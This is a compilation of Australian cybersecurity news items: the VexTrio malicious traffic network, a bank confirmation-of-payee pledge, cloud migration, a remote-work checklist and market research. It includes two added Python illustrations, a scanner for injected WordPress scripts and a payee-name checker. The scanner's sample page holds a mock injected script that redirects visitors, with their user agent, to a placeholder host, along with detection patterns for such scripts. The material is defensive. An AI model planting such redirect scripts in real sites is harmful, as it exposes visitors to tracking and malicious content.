Digital Business

Infoblox exposes cybercrime group VexTrio operating a huge criminal affiliate program targeting Australia

INFOBLOX has released new research unveiling a set of large-scale malicious cybercriminal partnerships led by VexTrio, the group cybersecurity specialists refer to as ‘an insidious threat actor’.

The partnerships involve a more than 60-strong underground affiliate network and are seeing high volumes of malware and other malicious content delivered to networks in Australia, New Zealand and across the globe.

Formed more than six years ago, VexTrio is now one of the world’s largest malicious networks targeting internet users.

“While cybercriminals are often portrayed as gangs of hackers or lone brilliant coders, more often they buy and sell goods and services as part of a larger criminal economy,” Infoblox head of threat intelligence Renée Burton said. Now operating in the commercial cybersecurity world, Ms Burton is a former senior executive (DISL) with the US National Security Agency (NSA).

“For example, some actors sell malware services, and malware-as-a-service (MaaS) allows buyers easy access to the infrastructure necessary to commit crimes. These service providers also form strategic partnerships, similar to the way legitimate companies do, in order to extend the limits of their current operations.

“Such relationships are forged in secret and may include a number of partners, making them difficult to untangle and understand from an outside perspective.”

VexTrio acts as a cybercriminal broker and operates traffic distribution systems (TDS) that route users based on their device, operating system, location, and other characteristics to malicious websites.

VexTrio has largely evaded detection and strengthened its resilience against internet service providers’ efforts to suspend its assets, all while building up a unique ‘partner program’.

Key findings of the report

The report has identified that VexTrio creates the single most pervasive threat in Infoblox customers’ networks, active in more than 50 percent of those networks in just the last two years.

The threat actor acts as a broker of malicious traffic for more than 60 cybercriminal affiliates.

Partnerships tend to be longstanding and operate in a unique way, with VexTrio providing a number of dedicated servers to each affiliate.

Despite connecting millions of web users to malicious content for more than six years, VexTrio has largely evaded detection due to its successful business model that feeds on web traffic from its affiliates and has infrastructure built on compromised websites.

Two of its largest affiliates are ClearFake and SocGholish, malicious JavaScript frameworks that respectively present website visitors with harmful content and inject malicious JavaScript into vulnerable websites. SocGholish is widely considered to be one of the top three global threats today.

VexTrio is a prolific domain name system (DNS) attacker and has more than 70,000 known malicious domains.

Drive-by compromise attacks

According to Infoblox, the most common attack method deployed by VexTrio and its affiliates has so far been the ‘drive-by compromise’, where actors compromise vulnerable WordPress websites and inject malicious JavaScript into their HTML pages. 

This script typically contains a TDS that redirects victims to malicious infrastructure and gathers information such as their IP address. VexTrio also operates SMS scams where it sells victims’ phone numbers to other cybercriminals.
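As an added example (not code from the Infoblox report), the following Python scanner applies the pattern just described from the defender's side: it parses a WordPress page's HTML and flags external scripts loaded from hosts outside the site's own allowlist, plus inline scripts that both fingerprint the visitor and redirect, which is the TDS behaviour described above. The sample page and the hostnames in it are constructed placeholders, not real indicators.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page: a site's own script plus one injected external
# script and one injected inline TDS-style script. "tds.example" is a
# placeholder hostname, not a real indicator.
SAMPLE_HTML = """<!DOCTYPE html>
<html><head><title>Acme Blog</title>
<script src="https://acme.example/wp-includes/js/jquery/jquery.min.js"></script>
<script src="https://cdn.tds.example/c.js"></script>
</head><body>
<p>Welcome to our blog.</p>
<script>
var ua = navigator.userAgent; var p = navigator.platform;
if (/Android|iPhone/.test(ua)) { window.location.href = "https://go.tds.example/?u=" + encodeURIComponent(ua); }
</script>
</body></html>"""

# Two behaviours that together characterise an injected TDS script:
# it fingerprints the visitor, then sends them somewhere else.
FINGERPRINT = re.compile(r"navigator\.(userAgent|platform|language)|screen\.(width|height)")
REDIRECT = re.compile(r"window\.location(\.href|\.replace)?|document\.location|top\.location")


class ScriptCollector(HTMLParser):
    """Collect external script URLs and inline script bodies from a page."""

    def __init__(self):
        super().__init__()
        self.external = []   # src attribute of each <script src=...>
        self.inline = []     # body of each inline <script>
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            self.inline.append("".join(self._buf))


def scan_page(html, allowed_hosts):
    """Return (kind, detail) findings: external scripts from hosts not on the
    site's allowlist, and inline scripts that fingerprint and redirect."""
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for src in parser.external:
        host = urlparse(src).hostname or ""
        if host and host not in allowed_hosts:
            findings.append(("unexpected-external-script", src))
    for body in parser.inline:
        if FINGERPRINT.search(body) and REDIRECT.search(body):
            findings.append(("fingerprint-and-redirect", body.strip()[:60]))
    return findings


if __name__ == "__main__":
    for kind, detail in scan_page(SAMPLE_HTML, {"acme.example"}):
        print(kind, "->", detail)
```

Run against a crawl of your own site's pages, a non-empty result is a prompt to compare the page source against the files on disk and the site's known plug-ins.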

“Although difficult to identify and track, blocking VexTrio at the DNS level can disrupt and protect against a large spectrum of cybercriminal activity,” Ms Burton said.

“This can be achieved through using tailored DNS signatures and statistical-based algorithms to identify VexTrio’s intermediary TDS servers and domains shortly after they are registered.

As Australian organisations look to raise their security posture in the wake of the new Cyber Security Strategy, it’s important to understand how DNS threat actors like VexTrio operate, particularly as more than 90 percent of malware depends on DNS at some stage of its execution.”

Infoblox specialises in uniting networking and security to deliver high performance and high protection at the same time. Many Fortune 100 companies are Infoblox clients, as well as an ‘emerging innovators’ group for whom cyber security is ever more paramount. Infoblox promises “real-time visibility and control over who and what connects to your network, so your organization runs faster and stops threats earlier”.

The full report on VexTrio and its affiliate network can be found here.

Infoblox.com

Infoblox is also on LinkedIn and Twitter.


ends

ASBFEO backs banking industry pledge to head off scammers crippling small businesses

THE Australian Small Business and Family Enterprise Ombudsman (ASBFEO), Bruce Billson, has welcomed the significant commitment announced today by the banking industry to "better support small businesses to combat scams".

Mr Billson said a $100 million upgrade across the banking sector to confirm who money is being paid to by matching names with account numbers will particularly benefit small businesses who too often fall victim to the invoice substitution scam. 

“Nefarious cyber criminals can wreak havoc for a small business but sadly the number of scams and the size of the losses for small and family businesses are growing,” Mr Billson said.

“When a criminal impersonates your business, it not only costs you and your customers money but can damage your brand and lead to a loss of consumer trust and confidence and the ability to operate. Too often, it can be an enterprise-ending event for a small business.”

Scamwatch data shows small businesses lost $13.7 million to scams last year, a 95 percent increase compared with the previous year. The biggest contributor to these losses was payment redirection scams.

Mr Billson said small businesses had been particularly vulnerable to the invoice substitution scam – also called payment redirection scams or business email compromise – where cyber criminals get into their computer system and intercept emails to customers and insert different bank account details.

“A small business sends an invoice to somebody and the criminal changes the banking details,” Mr Billson said. “When it lands in the customer’s inbox, it looks legit and is a bill they were expecting so they pay it. The money goes to the criminal’s bank account and is quickly shifted, usually to cryptocurrency, and is gone.

“These jokers run off with the money, the customer has done their dough, and the small business hasn’t been paid," he said.

“ASBFEO has been highlighting the urgent need for a ‘confirmation of payee’ scheme to be introduced in Australia, noting similar programs operate in other countries offering a really practical safeguard. This ensures people can confirm they are transferring money to the person intended and that names are matched to BSB and account numbers.

“Today’s pledge by the banking industry to roll out a new confirmation of payee system will go a long way to stopping scammers being able to divert invoice payments by simply and silently changing a bank account number.”
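To show how the name-to-account matching described above defeats invoice substitution, here is an added illustration in Python (not code from ASBFEO, the banks or any real confirmation-of-payee service). The account directory, the names and the BSB/account numbers are constructed, and the "close match" similarity threshold is an illustrative choice, not a rule from the scheme.

```python
import re
from difflib import SequenceMatcher

# Constructed directory of registered account holders keyed by (BSB, account).
# A real confirmation-of-payee check queries the payee's bank for this; the
# dictionary simply stands in for that lookup. All values are made up.
ACCOUNT_HOLDERS = {
    ("062-000", "12345678"): "Acme Plumbing Pty Ltd",
    ("062-000", "87654321"): "J. Smith",
}

# Words that legitimately vary between an invoice and a bank record.
LEGAL_SUFFIXES = {"pty", "ltd", "limited", "inc", "co", "the"}


def normalise(name):
    """Lower-case, strip punctuation and common legal suffixes, collapse spaces."""
    words = re.sub(r"[^a-z0-9 ]", " ", name.lower()).split()
    return " ".join(w for w in words if w not in LEGAL_SUFFIXES)


def confirm_payee(invoice_name, bsb, account, lookup=ACCOUNT_HOLDERS):
    """Compare the payee name on an invoice with the holder registered against
    the BSB/account it names. Returns 'match', 'close match', 'no match' or
    'unknown account'."""
    holder = lookup.get((bsb, account))
    if holder is None:
        return "unknown account"
    a, b = normalise(invoice_name), normalise(holder)
    if a == b:
        return "match"
    # Illustrative threshold: a typo-level difference is warned about, not blocked.
    if SequenceMatcher(None, a, b).ratio() >= 0.85:
        return "close match"
    # Name and account disagree: the pattern of a substituted account number.
    return "no match"


def check_invoice(invoice):
    """Map the confirmation result to a payment decision: pay, warn or hold."""
    result = confirm_payee(invoice["payee_name"], invoice["bsb"], invoice["account"])
    action = {"match": "pay", "close match": "warn"}.get(result, "hold")
    return result, action


if __name__ == "__main__":
    genuine = {"payee_name": "ACME Plumbing Pty. Ltd.", "bsb": "062-000", "account": "12345678"}
    # The same invoice after an attacker swapped in their own account number.
    tampered = {"payee_name": "ACME Plumbing Pty. Ltd.", "bsb": "062-000", "account": "87654321"}
    print(check_invoice(genuine))   # ('match', 'pay')
    print(check_invoice(tampered))  # ('no match', 'hold')
```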

Mr Billson noted the package of measures announced by the Australian Banking Association and the Customer Owned Banking Association will apply to commercial banks, customer owned banks, mutual banks, building societies and credit unions.

It will include more use of biometric checks and other controls to prevent scammers opening fraudulent bank accounts in other people’s names by using stolen information from driver’s licences, passports and other identity documents.

There will also be increased warnings and payment delays for suspicious transactions, limits on high-risk payment channels, which can include crypto platforms, and greater intelligence sharing across the banking sector using the Australian Financial Crimes Exchange.

However, Mr Billson said beating the scammers relied upon everyone being at their best by doing what they can to tackle the scourge of cyber crime and to “listen to our Spidey senses if something doesn’t seem right”.

“Business owners wouldn’t leave the door open with the light on at night when there's no one there, so they must take the right steps and safeguards in the digital world,” Mr Billson said.

“Telecommunication companies are trying to do their bit via what's called a ‘clean pipes’ initiative, where they cut off a lot of cyber threat traffic through the telecommunications infrastructure.

“And just last week the Australian Government announced two programs offering small businesses practical help to minimise the chance of falling victim to a cyber attack and to better prepare them to bounce back."

Mr Billson said next week is Scam Awareness Week and an ideal time for small business owners to take a few extra moments to check they have appropriate safeguards in place.

“Scamwatch says three in every four scam reports involve criminals pretending to be people we should trust,” Mr Billson said.

The new National Anti-Scam Centre said small business owners who feared they had fallen victim should contact the Report a Scam website (www.scamwatch.gov.au/report-a-scam) and dedicated resources to combat scams can be found at www.scamwatch.gov.au.

The Australian Cyber Security Centre, through the cyber.gov.au website, provides resources and guides for small businesses on how to manage information and secure their businesses, including a free Cyber Security Assessment Tool that can help a business identify its cyber security strengths and learn how to improve: www.cyber.gov.au/resources-business-and-government/essential-cyber-security/smallbusiness

The website also contains information on how to recover, and small businesses can report cyber attack incidents through 1300 CYBER1.

The ASBFEO website includes simple steps and a checklist to better protect small businesses: asbfeo.gov.au/resources-tools-centre/cyber-security.

ASBFEO's website also has a video offering tips which can be viewed at: www.youtube.com/watch?v=lxoZ1vjbalg


ends


Cyber attacks and other key misconceptions that derail the cloud journey for small-medium businesses

By Josh McHugh-Cullen >>

MANY small to medium business (SMB) owners share a common misconception. In a world of rapidly accelerating cybercrime targeting enterprises, public infrastructure, and even governments, they often think they are far too small to entice hackers or cybercriminals.

Cyberattacks on SMBs are unlikely to make the news in the same way that breaches exposing the personal details of millions of Australians do. However, that does not mean SMBs are immune to attacks.

Between July 2021 and June 2022, the Australian Cyber Security Centre (ACSC) received over 76,000 cybercrime reports. The average cost per cybercrime reported was over $39,000 for small businesses, $88,000 for medium businesses, and over $62,000 for large businesses. Unfortunately, SMBs are being targeted by threat actors, and the costs are significant. 

Cyberattacks are increasingly sophisticated and SMBs are being targeted because they are often viewed as easier targets than enterprises that are able to invest heavily in cybersecurity.

This means that SMB leaders need to prioritise cybersecurity in the most effective and cost-efficient way possible—which is migrating to the cloud and leveraging built-in, cloud-first security protocols.

Improved security is only one of the many benefits of the cloud for SMBs. Access to new business models, reduced costs, improved collaboration, and better opportunities for innovation are giving SMBs an edge in the competitive market.

Misconceptions are derailing the cloud journey for SMBs

Despite these benefits, some SMBs are still hesitant about the cloud. The most common concerns include:  

  • Security: SMBs often fear that cloud services might be more susceptible to hacking, data breaches, or unauthorised access compared to on-premises solutions.
  • Cost: while cloud services reduce costs in the long term, initial costs and ongoing subscription fees are sometimes believed to be more expensive than existing on-premises servers.
  • Customisation: out-of-the-box cloud services are built to cater to a broad audience, and this lack of customisation can be frustrating for SMBs that have unique processes or specific workflow requirements.
  • Dependency: when a business moves its data and services to the cloud, it becomes dependent on the cloud service provider, creating concerns about business continuity and reliability. 
  • Compliance: SMBs might not be sure if the cloud provider meets the necessary compliance standards or how to ensure that they remain compliant while using cloud services. 
  • Data sovereignty: data is subject to the laws and governance structures of the country in which it is located. By storing data in the cloud, it might be stored in a different country with different laws regarding data privacy and security.  
  • Legacy systems: transitioning to the cloud can mean abandoning investments into legacy systems.

Although these concerns persist, even after many cloud-native businesses have proven the agility and flexibility of operating in the cloud, they are unfounded.

For example, the cloud can mitigate the risk of cybercrime and prevent hackers from accessing and capitalising on sensitive data that can compromise employees, suppliers, customers, and businesses. Cloud migration can be a minimal initial investment that opens up more budgeting agility with fixed monthly subscription costs or pay-per-use consumption models.

The dependency on cloud uptime is also an unfounded fear, as most clouds have several redundancies built in, offering high levels of guaranteed uptime. Similarly, out-of-the-box services are built on best practice and actually help SMBs to follow tried and tested processes that support business growth, rather than investing in expensive customisations that are difficult to scale.

Finally, the cloud offers SMBs the ability to reduce costs associated with IT teams, deliver on-demand work environments, provide readily accessible data in real-time, and improve decision-making and the customer experience.

Simplified migrations to the cloud

Operating in the cloud can be both simple and intuitive; however, migrating to the cloud is often more complex than many SMBs expect. A DIY approach tends to feed into the concerns SMBs initially had, derailing digital transformation even further.  

The different types of clouds and services, each with their own advantages and disadvantages, can be overwhelming. Migration to the cloud requires a thorough assessment of the business’s infrastructure, careful planning, testing and retesting, scaling, and ongoing management.

Enlisting the support of experienced partners can alleviate the complexity associated with cloud migration and help SMBs identify the best cloud solution for their needs while providing guidance on using these solutions effectively. 


About the author

Josh McHugh-Cullen is the regional sales executive for ECI Software Solutions. ECI Software Solutions’ mission is to empower the entrepreneurial spirit, assisting small and medium-sized businesses to compete and grow by providing industry expertise and purpose-built solutions that make doing business easier. www.ecisolutions.com

ends

Cybersecurity checklist for working remotely 

WHILE REMOTE WORK offers flexibility and new opportunities, it also presents cybersecurity challenges.

As more organisations adopt remote and hybrid working practices, there is an increase in access to sensitive data from various locations. This has caused targeted attacks to rise, often exploiting human emotions through tactics like phishing, pretexting, and baiting.  

TeamViewer Asia-Pacific president, Sojung Lee, said, “Social engineering attackers have used these tactics for a long time. These tactics work because they prey on human nature, manipulating it to gain unauthorised access to confidential information. 

“Unfortunately, attacks are becoming more personalised and targeted, making it essential for every team to recognise these dangers and be prepared to fight against them.” 

Cybersecurity checklist for remote working 

Ms Lee said very few people were information technology (IT) experts and many may not know where to start. However, following the advice of a cybersecurity checklist can help companies keep safe from cyber threats, even when employees are working remotely. 

Check 1 — Education and awareness:  

  • Recognise targeted attacks: regularly train staff to identify spear phishing, whaling, and other targeted attacks that exploit personal information. 
  • Avoid unknown devices and baiting: educate employees not to plug unfamiliar devices like USBs into their systems. Highlight the risks of baiting, where malicious devices are left for workers to find.
  • Implement protocols against pretexting: establish protocols and code words to minimise risks from pretexters impersonating legitimate access holders, such as vendors or technical support. 
  • Encourage caution with personal information: warn against sharing personal details that could be used in spear phishing campaigns. 
  • Promote continuous education: emphasise that ongoing learning is the cornerstone of cybersecurity, especially in remote settings. 

Check 2 — Implement protocols and leverage technology: 

  • Use multi-factor authentication (MFA): employ MFA for connections and accounts for added security. 
  • Restrict USB port usage: control access to USB ports or use alternatives that remove the need for physical devices. 
  • Implement secure access features: use passwordless connection methods that provide stronger validation.
  • Leverage certificates: company-wide certificates, paired with trusted services that allow their implementation, provide easy and highly secure access. 

Check 3 — Promote password best practices:

  • Encourage unique passwords: advocate for different passwords across various sites and services. 
  • Recommend trusted password managers: promote the use of reliable tools for secure password storage.
  • Cultivate good password hygiene: foster a culture that appreciates and practises secure password habits.

“In a world where remote access is integral to business, organisations need to take full responsibility and implement a strict zero-trust policy, limiting access to critical resources and confidential information with designated role management and conditional access capabilities,” Ms Lee said.

“Together with an educated workforce, organisations can build a resilient, multi-layered defence, mitigating the constant threat of security incidents.

“Having a cybersecurity checklist is more than just a set of guidelines; it’s an essential part of business strategy in the remote working era,” she said.

“By adhering to these principles and leveraging the right technological solutions, organisations can maintain integrity and resilience against the constantly evolving cyber threats. 

“It’s essential to always err on the side of caution and recognise that social engineering preys on human nature itself. Understanding this is the key to preventing companies from becoming the next victim of these time-tested strategies.” 

www.teamviewer.com

ends

Australian businesses strengthen cybersecurity, rattled by major organisational breaches

AUSTRALIAN enterprise leaders are steadily recognising and unearthing growing threats, assessing risks and changing strategies to better detect and respond to attacks, according to a new ISG Provider Lens report.

The recent series of damaging, high-profile data leaks in Australia has changed the way Australian organisations approach enterprise security and procure cybersecurity services, according to the new research published today by Information Services Group (ISG, Nasdaq: III), a global technology research and advisory firm with runs on the board in cybersecurity.

The 2023 ISG Provider Lens Cybersecurity Solutions and Services report for Australia has found the attacks revealed escalating threats and changed cybersecurity from solely an information technology (IT) issue to a closely monitored enterprise challenge.

“Australian companies recognise the business dangers of data leaks,” ISG Cybersecurity director for ANZ and Asia Pacific, Joyce Harkness said.

“Top management and boards are increasingly interested in cyber risk and the quantification of such risk, and are involved in decision-making about strategies, products and services.” 

The Australian Government has strengthened the country’s cybersecurity response by imposing the Notifiable Data Breaches (NDB) scheme, which requires organisations to report breaches, and working with the state of South Australia to establish the Australian Cyber Collaboration Centre, an incubator for new security solutions and initiatives.

More recently, the Federal Government unveiled the 2023-2030 Australian Cyber Security Strategy, aimed at making Australia one of the most cyber secure nations in the world by 2030. The government also appointed Australia’s first cyber security coordinator and began operationalising the Security of Critical Infrastructure Act 2018.

Plugging security capability gaps

Recent attacks revealed that even large Australian enterprises had cyber capability gaps, the report said.

Most had invested heavily in cybersecurity controls but focused only on preventing breaches and assumed all sensitive data was in offices. In reality, the ‘attack surface’ has expanded with the rise of remote work, digital engagement, an expanding supply chain and the internet of things (IoT).

Mistakes inside organisations and among IT provider partners, such as employees falling prey to phishing attacks or making configuration errors, are thought to have played a major role in recent leaks in Australia and elsewhere.

ISG reported that, as a result, Australian enterprises had “begun to assess their risk tolerance, evaluate current controls and take an ‘assume breach’ approach, recognising that not all breaches can be prevented and focusing on rapid detection and response”.

As they migrate to the cloud over the next few years, many Australian companies are expected to invest in cloud-based solutions, such as extended detection and response (XDR), the report said.

The report deduced that companies with multiple cybersecurity tools, “which often generate false positives that require manual intervention”, will also need greater automation and interoperability to relieve the pressure on security operations centres (SOCs). The role of artificial intelligence (AI) is expected to grow exponentially, often to secure IoT assets.

“We expect strong growth in the Australian security market over the next five years,” ISG Provider Lens Research partner and global leader, Jan Erik Aase said.

“Enterprises and providers will be investing heavily in both new technologies and essential skills.”

Australian business tries to get it right

The report also explored other cybersecurity trends in Australia, including the increasing adoption of zero-trust frameworks and next-generation identity and access management (IAM) to maintain high-level security while enabling improved customer experience.

The 2023 ISG Provider Lens Cybersecurity Solutions and Services report for Australia evaluates the capabilities of 82 providers across six quadrants: identity and access management (IAM), extended detection and response (XDR), security service edge (SSE), technical security services, strategic security services, and managed security services (SOC).

The report named IBM as a leader in four quadrants. It names Accenture, CyberCX, Deloitte, DXC Technology, Fujitsu, NTT DATA, Telstra, Tesserent, Verizon Business and Wipro as leaders in three quadrants each. Microsoft is named as a leader in two quadrants.

Bitdefender, Broadcom, Cato Networks, CGI, Cisco, CrowdStrike, CyberArk, EY, Forcepoint, HCLTech, Infosys, Kasada, KPMG, Netskope, Okta, Palo Alto Networks, Ping Identity, PwC, SailPoint, Tech Mahindra, Unisys, Versa Networks, VMware and Zscaler are named as leaders in one quadrant each.

In addition, Kyndryl is named as a ‘rising star’ — a company with a “promising portfolio” and “high future potential” by ISG’s definition — in two quadrants. BeyondTrust, HPE (Aruba), Macquarie Telecom Group and SentinelOne are named as rising stars in one quadrant each.

The 2023 ISG Provider Lens Cybersecurity Solutions and Services report for Australia is available through https://isg-one.com.


ends

Why investing in reliable payment gateways is crucial for business success

By Ricky Blacker >>

AN ONLINE STORE’s primary purpose is to generate conversions. To succeed, the website must provide an efficient, secure and positive customer experience.

With digital wallets increasingly overtaking credit cards for online payments (FIS Global Payments Report), it is more important than ever for businesses to accommodate a range of payment methods and ensure they function smoothly.

Payment gateways are what make online payments possible, as they connect a business’s website to its merchant account, such as PayPal or Stripe. Depending on the merchant(s) selected, a business can accept payments in a range of currencies and leverage different plug-ins to tailor the checkout process based on business and customer preferences. 

It’s important to choose a strong, reliable payment gateway to protect the reputation and financial success of the business. An inefficient payment gateway, or worse, an error in the platform, can result in additional processing fees or even legal implications. 

Time spent rectifying technical issues may also increase website downtime, thereby impacting potential sales. Together, these can negatively affect the user experience and trust in the brand.

Trusted payment gateways make your customers ‘secure’ with you

If customers do not feel safe entering their payment details via your website, they are likely to seek and choose an alternative provider.

In contrast, adopting trusted payment gateways ensures that the final stage of the purchase is easy, which can avoid last minute change of mind, increase the customer’s basket size and encourage repeat purchases.

Once installed, the payment gateways do need to be kept updated and operating at optimal level. This maintenance may seem tedious and complicated but it is crucial for success.

Fortunately, choosing a quality website hosting platform can make this process much easier. For example, WP Engine works seamlessly with WooCommerce, one of the most powerful and flexible platforms to transform websites into online stores, to enable easy integration.

By selecting a managed WooCommerce hosting service, businesses can also outsource website management, ensuring site speed optimisation, automatic updates and free Secure Sockets Layer (SSL) certificates are maintained as necessary. This means businesses get time back to focus on their product and service offerings.

Success is all about trust

Recognised and trusted payment processing gateways are highly beneficial in gaining consumer trust. When customers see a trusted brand logo such as Stripe, they instantly have peace of mind that any payment details they input will be handled securely.

Choosing a website hosting platform that integrates deeply with one or more trusted payment gateways can accelerate and simplify payment gateway set up.

For example, WP Engine’s new Stripe Connect integration includes Stripe in the WooCommerce store building and management process, so there’s no need to seek out or pay for add-ons — it’s preconfigured to just work.

This new offering also makes Stripe integrations more secure, as businesses can connect to an existing Stripe account without using API keys and credentials.

A good payment gateway needs strong website infrastructure to support it. A slow website that lacks a robust security infrastructure can increase the risk of website crashes and data leaks.

Long loading times may also deter customers from completing their purchase or result in payment processes timing out.

In the best case, this can impact brand reputation. In the worst case, this may lead to incorrect or duplicate payments, resulting in customer frustration.

Therefore, businesses should ensure they constantly optimise their website for speed and ensure they adhere to basic cyber hygiene principles, such as ensuring plug-ins are updated.

Consider managed web hosting

For businesses that want to make efficient use of time and resources, working with a managed web hosting platform or agency can greatly alleviate workloads and pressure.

For example, WP Engine leverages automated plug-in and WordPress updates to ensure vulnerabilities are repaired as soon as possible.

Reliable payment gateways are a key factor in increasing business sales and overall success. Not only do they affect sales and conversions, they also impact consumer trust and brand reputation.

By choosing reliable payment gateways and working with a web hosting platform that enables easy integration and management, businesses can succeed online while having more time and resources to focus on what they do best.

www.wpengine.com.au


About the author

Ricky Blacker is a senior sales engineer and WordPress ‘evangelist’ at WP Engine, a Brisbane-headquartered company that has developed into one of the world’s leading managed WordPress platforms and hosting services. WP Engine has been voted the number one WordPress platform globally in 2023.

ends
